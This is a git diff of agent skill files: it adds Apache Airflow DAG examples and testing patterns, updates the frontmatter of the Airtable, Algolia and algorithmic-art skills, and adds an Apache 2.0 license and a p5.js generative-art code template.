|
||||
'email_on_retry': False,
|
||||
'retries': 3,
|
||||
'retry_delay': timedelta(minutes=5),
|
||||
'retry_exponential_backoff': True,
|
||||
'max_retry_delay': timedelta(hours=1),
|
||||
}
|
||||
|
||||
with DAG(
|
||||
dag_id='example_etl',
|
||||
default_args=default_args,
|
||||
description='Example ETL pipeline',
|
||||
schedule='0 6 * * *', # Daily at 6 AM
|
||||
start_date=datetime(2024, 1, 1),
|
||||
catchup=False,
|
||||
tags=['etl', 'example'],
|
||||
max_active_runs=1,
|
||||
) as dag:
|
||||
|
||||
start = EmptyOperator(task_id='start')
|
||||
|
||||
def extract_data(**context):
|
||||
execution_date = context['ds']
|
||||
# Extract logic here
|
||||
return {'records': 1000}
|
||||
|
||||
extract = PythonOperator(
|
||||
task_id='extract',
|
||||
python_callable=extract_data,
|
||||
)
|
||||
|
||||
end = EmptyOperator(task_id='end')
|
||||
|
||||
start >> extract >> end
|
||||
```
|
||||
|
||||
## Patterns
|
||||
|
||||
### Pattern 1: TaskFlow API (Airflow 2.0+)
|
||||
|
||||
```python
|
||||
# dags/taskflow_example.py
|
||||
from datetime import datetime
|
||||
from airflow.decorators import dag, task
|
||||
from airflow.models import Variable
|
||||
|
||||
@dag(
|
||||
dag_id='taskflow_etl',
|
||||
schedule='@daily',
|
||||
start_date=datetime(2024, 1, 1),
|
||||
catchup=False,
|
||||
tags=['etl', 'taskflow'],
|
||||
)
|
||||
def taskflow_etl():
|
||||
"""ETL pipeline using TaskFlow API"""
|
||||
|
||||
@task()
|
||||
def extract(source: str) -> dict:
|
||||
"""Extract data from source"""
|
||||
import pandas as pd
|
||||
|
||||
df = pd.read_csv(f's3://bucket/{source}/{{ ds }}.csv')
|
||||
return {'data': df.to_dict(), 'rows': len(df)}
|
||||
|
||||
@task()
|
||||
def transform(extracted: dict) -> dict:
|
||||
"""Transform extracted data"""
|
||||
import pandas as pd
|
||||
|
||||
df = pd.DataFrame(extracted['data'])
|
||||
df['processed_at'] = datetime.now()
|
||||
df = df.dropna()
|
||||
return {'data': df.to_dict(), 'rows': len(df)}
|
||||
|
||||
@task()
|
||||
def load(transformed: dict, target: str):
|
||||
"""Load data to target"""
|
||||
import pandas as pd
|
||||
|
||||
df = pd.DataFrame(transformed['data'])
|
||||
df.to_parquet(f's3://bucket/{target}/{{ ds }}.parquet')
|
||||
return transformed['rows']
|
||||
|
||||
@task()
|
||||
def notify(rows_loaded: int):
|
||||
"""Send notification"""
|
||||
print(f'Loaded {rows_loaded} rows')
|
||||
|
||||
# Define dependencies with XCom passing
|
||||
extracted = extract(source='raw_data')
|
||||
transformed = transform(extracted)
|
||||
loaded = load(transformed, target='processed_data')
|
||||
notify(loaded)
|
||||
|
||||
# Instantiate the DAG
|
||||
taskflow_etl()
|
||||
```
|
||||
|
||||
### Pattern 2: Dynamic DAG Generation
|
||||
|
||||
```python
|
||||
# dags/dynamic_dag_factory.py
|
||||
from datetime import datetime, timedelta
|
||||
from airflow import DAG
|
||||
from airflow.operators.python import PythonOperator
|
||||
from airflow.models import Variable
|
||||
import json
|
||||
|
||||
# Configuration for multiple similar pipelines
|
||||
PIPELINE_CONFIGS = [
|
||||
{'name': 'customers', 'schedule': '@daily', 'source': 's3://raw/customers'},
|
||||
{'name': 'orders', 'schedule': '@hourly', 'source': 's3://raw/orders'},
|
||||
{'name': 'products', 'schedule': '@weekly', 'source': 's3://raw/products'},
|
||||
]
|
||||
|
||||
def create_dag(config: dict) -> DAG:
|
||||
"""Factory function to create DAGs from config"""
|
||||
|
||||
dag_id = f"etl_{config['name']}"
|
||||
|
||||
default_args = {
|
||||
'owner': 'data-team',
|
||||
'retries': 3,
|
||||
'retry_delay': timedelta(minutes=5),
|
||||
}
|
||||
|
||||
dag = DAG(
|
||||
dag_id=dag_id,
|
||||
default_args=default_args,
|
||||
schedule=config['schedule'],
|
||||
start_date=datetime(2024, 1, 1),
|
||||
catchup=False,
|
||||
tags=['etl', 'dynamic', config['name']],
|
||||
)
|
||||
|
||||
with dag:
|
||||
def extract_fn(source, **context):
|
||||
print(f"Extracting from {source} for {context['ds']}")
|
||||
|
||||
def transform_fn(**context):
|
||||
print(f"Transforming data for {context['ds']}")
|
||||
|
||||
def load_fn(table_name, **context):
|
||||
print(f"Loading to {table_name} for {context['ds']}")
|
||||
|
||||
extract = PythonOperator(
|
||||
task_id='extract',
|
||||
python_callable=extract_fn,
|
||||
op_kwargs={'source': config['source']},
|
||||
)
|
||||
|
||||
transform = PythonOperator(
|
||||
task_id='transform',
|
||||
python_callable=transform_fn,
|
||||
)
|
||||
|
||||
load = PythonOperator(
|
||||
task_id='load',
|
||||
python_callable=load_fn,
|
||||
op_kwargs={'table_name': config['name']},
|
||||
)
|
||||
|
||||
extract >> transform >> load
|
||||
|
||||
return dag
|
||||
|
||||
# Generate DAGs
|
||||
for config in PIPELINE_CONFIGS:
|
||||
globals()[f"dag_{config['name']}"] = create_dag(config)
|
||||
```
|
||||
|
||||
### Pattern 3: Branching and Conditional Logic
|
||||
|
||||
```python
|
||||
# dags/branching_example.py
|
||||
from airflow.decorators import dag, task
|
||||
from airflow.operators.python import BranchPythonOperator
|
||||
from airflow.operators.empty import EmptyOperator
|
||||
from airflow.utils.trigger_rule import TriggerRule
|
||||
|
||||
@dag(
|
||||
dag_id='branching_pipeline',
|
||||
schedule='@daily',
|
||||
start_date=datetime(2024, 1, 1),
|
||||
catchup=False,
|
||||
)
|
||||
def branching_pipeline():
|
||||
|
||||
@task()
|
||||
def check_data_quality() -> dict:
|
||||
"""Check data quality and return metrics"""
|
||||
quality_score = 0.95 # Simulated
|
||||
return {'score': quality_score, 'rows': 10000}
|
||||
|
||||
def choose_branch(**context) -> str:
|
||||
"""Determine which branch to execute"""
|
||||
ti = context['ti']
|
||||
metrics = ti.xcom_pull(task_ids='check_data_quality')
|
||||
|
||||
if metrics['score'] >= 0.9:
|
||||
return 'high_quality_path'
|
||||
elif metrics['score'] >= 0.7:
|
||||
return 'medium_quality_path'
|
||||
else:
|
||||
return 'low_quality_path'
|
||||
|
||||
quality_check = check_data_quality()
|
||||
|
||||
branch = BranchPythonOperator(
|
||||
task_id='branch',
|
||||
python_callable=choose_branch,
|
||||
)
|
||||
|
||||
high_quality = EmptyOperator(task_id='high_quality_path')
|
||||
medium_quality = EmptyOperator(task_id='medium_quality_path')
|
||||
low_quality = EmptyOperator(task_id='low_quality_path')
|
||||
|
||||
# Join point - runs after any branch completes
|
||||
join = EmptyOperator(
|
||||
task_id='join',
|
||||
trigger_rule=TriggerRule.NONE_FAILED_MIN_ONE_SUCCESS,
|
||||
)
|
||||
|
||||
quality_check >> branch >> [high_quality, medium_quality, low_quality] >> join
|
||||
|
||||
branching_pipeline()
|
||||
```
|
||||
|
||||
### Pattern 4: Sensors and External Dependencies
|
||||
|
||||
```python
|
||||
# dags/sensor_patterns.py
|
||||
from datetime import datetime, timedelta
|
||||
from airflow import DAG
|
||||
from airflow.sensors.filesystem import FileSensor
|
||||
from airflow.providers.amazon.aws.sensors.s3 import S3KeySensor
|
||||
from airflow.sensors.external_task import ExternalTaskSensor
|
||||
from airflow.operators.python import PythonOperator
|
||||
|
||||
with DAG(
|
||||
dag_id='sensor_example',
|
||||
schedule='@daily',
|
||||
start_date=datetime(2024, 1, 1),
|
||||
catchup=False,
|
||||
) as dag:
|
||||
|
||||
# Wait for file on S3
|
||||
wait_for_file = S3KeySensor(
|
||||
task_id='wait_for_s3_file',
|
||||
bucket_name='data-lake',
|
||||
bucket_key='raw/{{ ds }}/data.parquet',
|
||||
aws_conn_id='aws_default',
|
||||
timeout=60 * 60 * 2, # 2 hours
|
||||
poke_interval=60 * 5, # Check every 5 minutes
|
||||
mode='reschedule', # Free up worker slot while waiting
|
||||
)
|
||||
|
||||
# Wait for another DAG to complete
|
||||
wait_for_upstream = ExternalTaskSensor(
|
||||
task_id='wait_for_upstream_dag',
|
||||
external_dag_id='upstream_etl',
|
||||
external_task_id='final_task',
|
||||
execution_date_fn=lambda dt: dt, # Same execution date
|
||||
timeout=60 * 60 * 3,
|
||||
mode='reschedule',
|
||||
)
|
||||
|
||||
# Custom sensor using @task.sensor decorator
|
||||
@task.sensor(poke_interval=60, timeout=3600, mode='reschedule')
|
||||
def wait_for_api() -> PokeReturnValue:
|
||||
"""Custom sensor for API availability"""
|
||||
import requests
|
||||
|
||||
response = requests.get('https://api.example.com/health')
|
||||
is_done = response.status_code == 200
|
||||
|
||||
return PokeReturnValue(is_done=is_done, xcom_value=response.json())
|
||||
|
||||
api_ready = wait_for_api()
|
||||
|
||||
def process_data(**context):
|
||||
api_result = context['ti'].xcom_pull(task_ids='wait_for_api')
|
||||
print(f"API returned: {api_result}")
|
||||
|
||||
process = PythonOperator(
|
||||
task_id='process',
|
||||
python_callable=process_data,
|
||||
)
|
||||
|
||||
[wait_for_file, wait_for_upstream, api_ready] >> process
|
||||
```
|
||||
|
||||
### Pattern 5: Error Handling and Alerts
|
||||
|
||||
```python
|
||||
# dags/error_handling.py
|
||||
from datetime import datetime, timedelta
|
||||
from airflow import DAG
|
||||
from airflow.operators.python import PythonOperator
|
||||
from airflow.utils.trigger_rule import TriggerRule
|
||||
from airflow.models import Variable
|
||||
|
||||
def task_failure_callback(context):
|
||||
"""Callback on task failure"""
|
||||
task_instance = context['task_instance']
|
||||
exception = context.get('exception')
|
||||
|
||||
# Send to Slack/PagerDuty/etc
|
||||
message = f"""
|
||||
Task Failed!
|
||||
DAG: {task_instance.dag_id}
|
||||
Task: {task_instance.task_id}
|
||||
Execution Date: {context['ds']}
|
||||
Error: {exception}
|
||||
Log URL: {task_instance.log_url}
|
||||
"""
|
||||
# send_slack_alert(message)
|
||||
print(message)
|
||||
|
||||
def dag_failure_callback(context):
|
||||
"""Callback on DAG failure"""
|
||||
# Aggregate failures, send summary
|
||||
pass
|
||||
|
||||
with DAG(
|
||||
dag_id='error_handling_example',
|
||||
schedule='@daily',
|
||||
start_date=datetime(2024, 1, 1),
|
||||
catchup=False,
|
||||
on_failure_callback=dag_failure_callback,
|
||||
default_args={
|
||||
'on_failure_callback': task_failure_callback,
|
||||
'retries': 3,
|
||||
'retry_delay': timedelta(minutes=5),
|
||||
},
|
||||
) as dag:
|
||||
|
||||
def might_fail(**context):
|
||||
import random
|
||||
if random.random() < 0.3:
|
||||
raise ValueError("Random failure!")
|
||||
return "Success"
|
||||
|
||||
risky_task = PythonOperator(
|
||||
task_id='risky_task',
|
||||
python_callable=might_fail,
|
||||
)
|
||||
|
||||
def cleanup(**context):
|
||||
"""Cleanup runs regardless of upstream failures"""
|
||||
print("Cleaning up...")
|
||||
|
||||
cleanup_task = PythonOperator(
|
||||
task_id='cleanup',
|
||||
python_callable=cleanup,
|
||||
trigger_rule=TriggerRule.ALL_DONE, # Run even if upstream fails
|
||||
)
|
||||
|
||||
def notify_success(**context):
|
||||
"""Only runs if all upstream succeeded"""
|
||||
print("All tasks succeeded!")
|
||||
|
||||
success_notification = PythonOperator(
|
||||
task_id='notify_success',
|
||||
python_callable=notify_success,
|
||||
trigger_rule=TriggerRule.ALL_SUCCESS,
|
||||
)
|
||||
|
||||
risky_task >> [cleanup_task, success_notification]
|
||||
```
|
||||
|
||||
### Pattern 6: Testing DAGs
|
||||
|
||||
```python
|
||||
# tests/test_dags.py
|
||||
import pytest
|
||||
from datetime import datetime
|
||||
from airflow.models import DagBag
|
||||
|
||||
@pytest.fixture
|
||||
def dagbag():
|
||||
return DagBag(dag_folder='dags/', include_examples=False)
|
||||
|
||||
def test_dag_loaded(dagbag):
|
||||
"""Test that all DAGs load without errors"""
|
||||
assert len(dagbag.import_errors) == 0, f"DAG import errors: {dagbag.import_errors}"
|
||||
|
||||
def test_dag_structure(dagbag):
|
||||
"""Test specific DAG structure"""
|
||||
dag = dagbag.get_dag('example_etl')
|
||||
|
||||
assert dag is not None
|
||||
assert len(dag.tasks) == 3
|
||||
assert dag.schedule_interval == '0 6 * * *'
|
||||
|
||||
def test_task_dependencies(dagbag):
|
||||
"""Test task dependencies are correct"""
|
||||
dag = dagbag.get_dag('example_etl')
|
||||
|
||||
extract_task = dag.get_task('extract')
|
||||
assert 'start' in [t.task_id for t in extract_task.upstream_list]
|
||||
assert 'end' in [t.task_id for t in extract_task.downstream_list]
|
||||
|
||||
def test_dag_integrity(dagbag):
|
||||
"""Test DAG has no cycles and is valid"""
|
||||
for dag_id, dag in dagbag.dags.items():
|
||||
assert dag.test_cycle() is None, f"Cycle detected in {dag_id}"
|
||||
|
||||
# Test individual task logic
|
||||
def test_extract_function():
|
||||
"""Unit test for extract function"""
|
||||
from dags.example_dag import extract_data
|
||||
|
||||
result = extract_data(ds='2024-01-01')
|
||||
assert 'records' in result
|
||||
assert isinstance(result['records'], int)
|
||||
```
|
||||
|
||||
## Project Structure
|
||||
|
||||
```
|
||||
airflow/
|
||||
├── dags/
|
||||
│ ├── __init__.py
|
||||
│ ├── common/
|
||||
│ │ ├── __init__.py
|
||||
│ │ ├── operators.py # Custom operators
|
||||
│ │ ├── sensors.py # Custom sensors
|
||||
│ │ └── callbacks.py # Alert callbacks
|
||||
│ ├── etl/
|
||||
│ │ ├── customers.py
|
||||
│ │ └── orders.py
|
||||
│ └── ml/
|
||||
│ └── training.py
|
||||
├── plugins/
|
||||
│ └── custom_plugin.py
|
||||
├── tests/
|
||||
│ ├── __init__.py
|
||||
│ ├── test_dags.py
|
||||
│ └── test_operators.py
|
||||
├── docker-compose.yml
|
||||
└── requirements.txt
|
||||
```
|
||||
|
||||
## Best Practices
|
||||
|
||||
### Do's
|
||||
- **Use TaskFlow API** - Cleaner code, automatic XCom
|
||||
- **Set timeouts** - Prevent zombie tasks
|
||||
- **Use `mode='reschedule'`** - For sensors, free up workers
|
||||
- **Test DAGs** - Unit tests and integration tests
|
||||
- **Idempotent tasks** - Safe to retry
|
||||
|
||||
### Don'ts
|
||||
- **Don't use `depends_on_past=True`** - Creates bottlenecks
|
||||
- **Don't hardcode dates** - Use `{{ ds }}` macros
|
||||
- **Don't use global state** - Tasks should be stateless
|
||||
- **Don't skip catchup blindly** - Understand implications
|
||||
- **Don't put heavy logic in DAG file** - Import from modules
|
||||
|
||||
## Resources
|
||||
|
||||
- [Airflow Documentation](https://airflow.apache.org/docs/)
|
||||
- [Astronomer Guides](https://docs.astronomer.io/learn)
|
||||
- [TaskFlow API](https://airflow.apache.org/docs/apache-airflow/stable/tutorial/taskflow.html)
|
||||
@@ -1,10 +1,9 @@
|
||||
---
|
||||
name: airtable-automation
|
||||
description: "Automate Airtable tasks via Rube MCP (Composio): records, bases, tables, fields, views. Always search tools first for current schemas."
|
||||
requires:
|
||||
mcp: [rube]
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Airtable Automation via Rube MCP
|
||||
|
||||
@@ -1,8 +1,9 @@
|
||||
---
|
||||
name: algolia-search
|
||||
description: "Expert patterns for Algolia search implementation, indexing strategies, React InstantSearch, and relevance tuning Use when: adding search to, algolia, instantsearch, search api, search functionality."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
risk: unknown
|
||||
source: "vibeship-spawner-skills (Apache 2.0)"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Algolia Search Integration
|
||||
|
||||
202
web-app/public/skills/algorithmic-art/LICENSE.txt
Normal file
202
web-app/public/skills/algorithmic-art/LICENSE.txt
Normal file
@@ -0,0 +1,202 @@
|
||||
|
||||
Apache License
|
||||
Version 2.0, January 2004
|
||||
http://www.apache.org/licenses/
|
||||
|
||||
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
|
||||
|
||||
1. Definitions.
|
||||
|
||||
"License" shall mean the terms and conditions for use, reproduction,
|
||||
and distribution as defined by Sections 1 through 9 of this document.
|
||||
|
||||
"Licensor" shall mean the copyright owner or entity authorized by
|
||||
the copyright owner that is granting the License.
|
||||
|
||||
"Legal Entity" shall mean the union of the acting entity and all
|
||||
other entities that control, are controlled by, or are under common
|
||||
control with that entity. For the purposes of this definition,
|
||||
"control" means (i) the power, direct or indirect, to cause the
|
||||
direction or management of such entity, whether by contract or
|
||||
otherwise, or (ii) ownership of fifty percent (50%) or more of the
|
||||
outstanding shares, or (iii) beneficial ownership of such entity.
|
||||
|
||||
"You" (or "Your") shall mean an individual or Legal Entity
|
||||
exercising permissions granted by this License.
|
||||
|
||||
"Source" form shall mean the preferred form for making modifications,
|
||||
including but not limited to software source code, documentation
|
||||
source, and configuration files.
|
||||
|
||||
"Object" form shall mean any form resulting from mechanical
|
||||
transformation or translation of a Source form, including but
|
||||
not limited to compiled object code, generated documentation,
|
||||
and conversions to other media types.
|
||||
|
||||
"Work" shall mean the work of authorship, whether in Source or
|
||||
Object form, made available under the License, as indicated by a
|
||||
copyright notice that is included in or attached to the work
|
||||
(an example is provided in the Appendix below).
|
||||
|
||||
"Derivative Works" shall mean any work, whether in Source or Object
|
||||
form, that is based on (or derived from) the Work and for which the
|
||||
editorial revisions, annotations, elaborations, or other modifications
|
||||
represent, as a whole, an original work of authorship. For the purposes
|
||||
of this License, Derivative Works shall not include works that remain
|
||||
separable from, or merely link (or bind by name) to the interfaces of,
|
||||
the Work and Derivative Works thereof.
|
||||
|
||||
"Contribution" shall mean any work of authorship, including
|
||||
the original version of the Work and any modifications or additions
|
||||
to that Work or Derivative Works thereof, that is intentionally
|
||||
submitted to Licensor for inclusion in the Work by the copyright owner
|
||||
or by an individual or Legal Entity authorized to submit on behalf of
|
||||
the copyright owner. For the purposes of this definition, "submitted"
|
||||
means any form of electronic, verbal, or written communication sent
|
||||
to the Licensor or its representatives, including but not limited to
|
||||
communication on electronic mailing lists, source code control systems,
|
||||
and issue tracking systems that are managed by, or on behalf of, the
|
||||
Licensor for the purpose of discussing and improving the Work, but
|
||||
excluding communication that is conspicuously marked or otherwise
|
||||
designated in writing by the copyright owner as "Not a Contribution."
|
||||
|
||||
"Contributor" shall mean Licensor and any individual or Legal Entity
|
||||
on behalf of whom a Contribution has been received by Licensor and
|
||||
subsequently incorporated within the Work.
|
||||
|
||||
2. Grant of Copyright License. Subject to the terms and conditions of
|
||||
this License, each Contributor hereby grants to You a perpetual,
|
||||
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
||||
copyright license to reproduce, prepare Derivative Works of,
|
||||
publicly display, publicly perform, sublicense, and distribute the
|
||||
Work and such Derivative Works in Source or Object form.
|
||||
|
||||
3. Grant of Patent License. Subject to the terms and conditions of
|
||||
this License, each Contributor hereby grants to You a perpetual,
|
||||
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
||||
(except as stated in this section) patent license to make, have made,
|
||||
use, offer to sell, sell, import, and otherwise transfer the Work,
|
||||
where such license applies only to those patent claims licensable
|
||||
by such Contributor that are necessarily infringed by their
|
||||
Contribution(s) alone or by combination of their Contribution(s)
|
||||
with the Work to which such Contribution(s) was submitted. If You
|
||||
institute patent litigation against any entity (including a
|
||||
cross-claim or counterclaim in a lawsuit) alleging that the Work
|
||||
or a Contribution incorporated within the Work constitutes direct
|
||||
or contributory patent infringement, then any patent licenses
|
||||
granted to You under this License for that Work shall terminate
|
||||
as of the date such litigation is filed.
|
||||
|
||||
4. Redistribution. You may reproduce and distribute copies of the
|
||||
Work or Derivative Works thereof in any medium, with or without
|
||||
modifications, and in Source or Object form, provided that You
|
||||
meet the following conditions:
|
||||
|
||||
(a) You must give any other recipients of the Work or
|
||||
Derivative Works a copy of this License; and
|
||||
|
||||
(b) You must cause any modified files to carry prominent notices
|
||||
stating that You changed the files; and
|
||||
|
||||
(c) You must retain, in the Source form of any Derivative Works
|
||||
that You distribute, all copyright, patent, trademark, and
|
||||
attribution notices from the Source form of the Work,
|
||||
excluding those notices that do not pertain to any part of
|
||||
the Derivative Works; and
|
||||
|
||||
(d) If the Work includes a "NOTICE" text file as part of its
|
||||
distribution, then any Derivative Works that You distribute must
|
||||
include a readable copy of the attribution notices contained
|
||||
within such NOTICE file, excluding those notices that do not
|
||||
pertain to any part of the Derivative Works, in at least one
|
||||
of the following places: within a NOTICE text file distributed
|
||||
as part of the Derivative Works; within the Source form or
|
||||
documentation, if provided along with the Derivative Works; or,
|
||||
within a display generated by the Derivative Works, if and
|
||||
wherever such third-party notices normally appear. The contents
|
||||
of the NOTICE file are for informational purposes only and
|
||||
do not modify the License. You may add Your own attribution
|
||||
notices within Derivative Works that You distribute, alongside
|
||||
or as an addendum to the NOTICE text from the Work, provided
|
||||
that such additional attribution notices cannot be construed
|
||||
as modifying the License.
|
||||
|
||||
You may add Your own copyright statement to Your modifications and
|
||||
may provide additional or different license terms and conditions
|
||||
for use, reproduction, or distribution of Your modifications, or
|
||||
for any such Derivative Works as a whole, provided Your use,
|
||||
reproduction, and distribution of the Work otherwise complies with
|
||||
the conditions stated in this License.
|
||||
|
||||
5. Submission of Contributions. Unless You explicitly state otherwise,
|
||||
any Contribution intentionally submitted for inclusion in the Work
|
||||
by You to the Licensor shall be under the terms and conditions of
|
||||
this License, without any additional terms or conditions.
|
||||
Notwithstanding the above, nothing herein shall supersede or modify
|
||||
the terms of any separate license agreement you may have executed
|
||||
with Licensor regarding such Contributions.
|
||||
|
||||
6. Trademarks. This License does not grant permission to use the trade
|
||||
names, trademarks, service marks, or product names of the Licensor,
|
||||
except as required for reasonable and customary use in describing the
|
||||
origin of the Work and reproducing the content of the NOTICE file.
|
||||
|
||||
7. Disclaimer of Warranty. Unless required by applicable law or
|
||||
agreed to in writing, Licensor provides the Work (and each
|
||||
Contributor provides its Contributions) on an "AS IS" BASIS,
|
||||
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
|
||||
implied, including, without limitation, any warranties or conditions
|
||||
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
|
||||
PARTICULAR PURPOSE. You are solely responsible for determining the
|
||||
appropriateness of using or redistributing the Work and assume any
|
||||
risks associated with Your exercise of permissions under this License.
|
||||
|
||||
8. Limitation of Liability. In no event and under no legal theory,
|
||||
whether in tort (including negligence), contract, or otherwise,
|
||||
unless required by applicable law (such as deliberate and grossly
|
||||
negligent acts) or agreed to in writing, shall any Contributor be
|
||||
liable to You for damages, including any direct, indirect, special,
|
||||
incidental, or consequential damages of any character arising as a
|
||||
result of this License or out of the use or inability to use the
|
||||
Work (including but not limited to damages for loss of goodwill,
|
||||
work stoppage, computer failure or malfunction, or any and all
|
||||
other commercial damages or losses), even if such Contributor
|
||||
has been advised of the possibility of such damages.
|
||||
|
||||
9. Accepting Warranty or Additional Liability. While redistributing
|
||||
the Work or Derivative Works thereof, You may choose to offer,
|
||||
and charge a fee for, acceptance of support, warranty, indemnity,
|
||||
or other liability obligations and/or rights consistent with this
|
||||
License. However, in accepting such obligations, You may act only
|
||||
on Your own behalf and on Your sole responsibility, not on behalf
|
||||
of any other Contributor, and only if You agree to indemnify,
|
||||
defend, and hold each Contributor harmless for any liability
|
||||
incurred by, or claims asserted against, such Contributor by reason
|
||||
of your accepting any such warranty or additional liability.
|
||||
|
||||
END OF TERMS AND CONDITIONS
|
||||
|
||||
APPENDIX: How to apply the Apache License to your work.
|
||||
|
||||
To apply the Apache License to your work, attach the following
|
||||
boilerplate notice, with the fields enclosed by brackets "[]"
|
||||
replaced with your own identifying information. (Don't include
|
||||
the brackets!) The text should be enclosed in the appropriate
|
||||
comment syntax for the file format. We also recommend that a
|
||||
file or class name and description of purpose be included on the
|
||||
same "printed page" as the copyright notice for easier
|
||||
identification within third-party archives.
|
||||
|
||||
Copyright [yyyy] [name of copyright owner]
|
||||
|
||||
Licensed under the Apache License, Version 2.0 (the "License");
|
||||
you may not use this file except in compliance with the License.
|
||||
You may obtain a copy of the License at
|
||||
|
||||
http://www.apache.org/licenses/LICENSE-2.0
|
||||
|
||||
Unless required by applicable law or agreed to in writing, software
|
||||
distributed under the License is distributed on an "AS IS" BASIS,
|
||||
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
See the License for the specific language governing permissions and
|
||||
limitations under the License.
|
||||
@@ -1,9 +1,9 @@
|
||||
---
|
||||
name: algorithmic-art
|
||||
description: "Creating algorithmic art using p5.js with seeded randomness and interactive parameter exploration. Use this when users request creating art using code, generative art, algorithmic art, flow fields,..."
|
||||
license: Complete terms in LICENSE.txt
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
Algorithmic philosophies are computational aesthetic movements that are then expressed through code. Output .md files (philosophy), .html files (interactive viewer), and .js files (generative algorithms).
|
||||
|
||||
@@ -0,0 +1,223 @@
|
||||
/**
|
||||
* ═══════════════════════════════════════════════════════════════════════════
|
||||
* P5.JS GENERATIVE ART - BEST PRACTICES
|
||||
* ═══════════════════════════════════════════════════════════════════════════
|
||||
*
|
||||
* This file shows STRUCTURE and PRINCIPLES for p5.js generative art.
|
||||
* It does NOT prescribe what art you should create.
|
||||
*
|
||||
* Your algorithmic philosophy should guide what you build.
|
||||
* These are just best practices for how to structure your code.
|
||||
*
|
||||
* ═══════════════════════════════════════════════════════════════════════════
|
||||
*/
|
||||
|
||||
// ============================================================================
|
||||
// 1. PARAMETER ORGANIZATION
|
||||
// ============================================================================
|
||||
// Keep all tunable parameters in one object
|
||||
// This makes it easy to:
|
||||
// - Connect to UI controls
|
||||
// - Reset to defaults
|
||||
// - Serialize/save configurations
|
||||
|
||||
let params = {
|
||||
// Define parameters that match YOUR algorithm
|
||||
// Examples (customize for your art):
|
||||
// - Counts: how many elements (particles, circles, branches, etc.)
|
||||
// - Scales: size, speed, spacing
|
||||
// - Probabilities: likelihood of events
|
||||
// - Angles: rotation, direction
|
||||
// - Colors: palette arrays
|
||||
|
||||
seed: 12345,
|
||||
// define colorPalette as an array -- choose whatever colors you'd like ['#d97757', '#6a9bcc', '#788c5d', '#b0aea5']
|
||||
// Add YOUR parameters here based on your algorithm
|
||||
};
|
||||
|
||||
// ============================================================================
|
||||
// 2. SEEDED RANDOMNESS (Critical for reproducibility)
|
||||
// ============================================================================
|
||||
// ALWAYS use seeded random for Art Blocks-style reproducible output
|
||||
|
||||
function initializeSeed(seed) {
|
||||
randomSeed(seed);
|
||||
noiseSeed(seed);
|
||||
// Now all random() and noise() calls will be deterministic
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// 3. P5.JS LIFECYCLE
|
||||
// ============================================================================
|
||||
|
||||
function setup() {
|
||||
createCanvas(800, 800);
|
||||
|
||||
// Initialize seed first
|
||||
initializeSeed(params.seed);
|
||||
|
||||
// Set up your generative system
|
||||
// This is where you initialize:
|
||||
// - Arrays of objects
|
||||
// - Grid structures
|
||||
// - Initial positions
|
||||
// - Starting states
|
||||
|
||||
// For static art: call noLoop() at the end of setup
|
||||
// For animated art: let draw() keep running
|
||||
}
|
||||
|
||||
function draw() {
|
||||
// Option 1: Static generation (runs once, then stops)
|
||||
// - Generate everything in setup()
|
||||
// - Call noLoop() in setup()
|
||||
// - draw() doesn't do much or can be empty
|
||||
|
||||
// Option 2: Animated generation (continuous)
|
||||
// - Update your system each frame
|
||||
// - Common patterns: particle movement, growth, evolution
|
||||
// - Can optionally call noLoop() after N frames
|
||||
|
||||
// Option 3: User-triggered regeneration
|
||||
// - Use noLoop() by default
|
||||
// - Call redraw() when parameters change
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// 4. CLASS STRUCTURE (When you need objects)
|
||||
// ============================================================================
|
||||
// Use classes when your algorithm involves multiple entities
|
||||
// Examples: particles, agents, cells, nodes, etc.
|
||||
|
||||
class Entity {
|
||||
constructor() {
|
||||
// Initialize entity properties
|
||||
// Use random() here - it will be seeded
|
||||
}
|
||||
|
||||
update() {
|
||||
// Update entity state
|
||||
// This might involve:
|
||||
// - Physics calculations
|
||||
// - Behavioral rules
|
||||
// - Interactions with neighbors
|
||||
}
|
||||
|
||||
display() {
|
||||
// Render the entity
|
||||
// Keep rendering logic separate from update logic
|
||||
}
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// 5. PERFORMANCE CONSIDERATIONS
|
||||
// ============================================================================
|
||||
|
||||
// For large numbers of elements:
|
||||
// - Pre-calculate what you can
|
||||
// - Use simple collision detection (spatial hashing if needed)
|
||||
// - Limit expensive operations (sqrt, trig) when possible
|
||||
// - Consider using p5 vectors efficiently
|
||||
|
||||
// For smooth animation:
|
||||
// - Aim for 60fps
|
||||
// - Profile if things are slow
|
||||
// - Consider reducing particle counts or simplifying calculations
|
||||
|
||||
// ============================================================================
|
||||
// 6. UTILITY FUNCTIONS
|
||||
// ============================================================================
|
||||
|
||||
// Color utilities
|
||||
function hexToRgb(hex) {
|
||||
const result = /^#?([a-f\d]{2})([a-f\d]{2})([a-f\d]{2})$/i.exec(hex);
|
||||
return result ? {
|
||||
r: parseInt(result[1], 16),
|
||||
g: parseInt(result[2], 16),
|
||||
b: parseInt(result[3], 16)
|
||||
} : null;
|
||||
}
|
||||
|
||||
function colorFromPalette(index) {
|
||||
return params.colorPalette[index % params.colorPalette.length];
|
||||
}
|
||||
|
||||
// Mapping and easing
|
||||
function mapRange(value, inMin, inMax, outMin, outMax) {
|
||||
return outMin + (outMax - outMin) * ((value - inMin) / (inMax - inMin));
|
||||
}
|
||||
|
||||
function easeInOutCubic(t) {
|
||||
return t < 0.5 ? 4 * t * t * t : 1 - Math.pow(-2 * t + 2, 3) / 2;
|
||||
}
|
||||
|
||||
// Constrain to bounds
|
||||
function wrapAround(value, max) {
|
||||
if (value < 0) return max;
|
||||
if (value > max) return 0;
|
||||
return value;
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// 7. PARAMETER UPDATES (Connect to UI)
|
||||
// ============================================================================
|
||||
